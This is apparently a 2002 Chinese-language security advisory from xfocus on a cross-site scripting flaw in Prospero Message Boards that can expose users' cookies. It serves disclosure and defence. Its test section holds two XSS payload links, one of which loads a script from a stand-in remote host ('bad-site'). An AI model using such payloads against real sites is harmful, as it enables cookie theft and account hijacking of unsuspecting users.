xfocus logo xfocus title
首页 焦点原创 安全文摘 安全工具 安全漏洞 焦点项目 焦点论坛 关于我们
English Version
 最近严重漏洞 
Microsoft RPC接口远程任意代码可执行漏洞
Cisco IOS接口不正确处理IPV4包远程拒绝服务漏洞
Microsoft Windows CreateFile API命名管道权限提升漏洞

Prospero Message Board 存在跨站脚本可执行漏洞


发布时间:2002-02-18
更新时间:2002-02-18
严重程度:
威胁程度:服务器信息泄露
错误类型:输入验证错误
利用方式:服务器模式

BUGTRAQ ID:4109

受影响系统
Prospero Technologies Message Boards
详细描述
Prospero Message Boards 是一款基于WEB的信息交流系统,提供社区和论坛功能。

HTML格式的信息贴到Prospero论坛上如果包含javaScript代码,当其他用户查看
时可造成脚本代码被执行,导致COOKIE信息泄露等问题。

测试代码
<A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT>malicious code</SCRIPT>"> Click here</A>
  
<A HREF="http://example.com/comment.cgi? mycomment=<SCRIPT SRC='http://bad-site/badfile'></SCRIPT>"> Click here</A>

解决方案
尚无

相关信息
参考:http://www.securityfocus.com/advisories/2077
相关主页:http://www.prospero.com/solutions_messages.htm#messageboards
http://www.sentinelchicken.com/advisories/prospero/index.php?PRINTABLE=true
Copyright © 1998-2003 XFOCUS Team. All Rights Reserved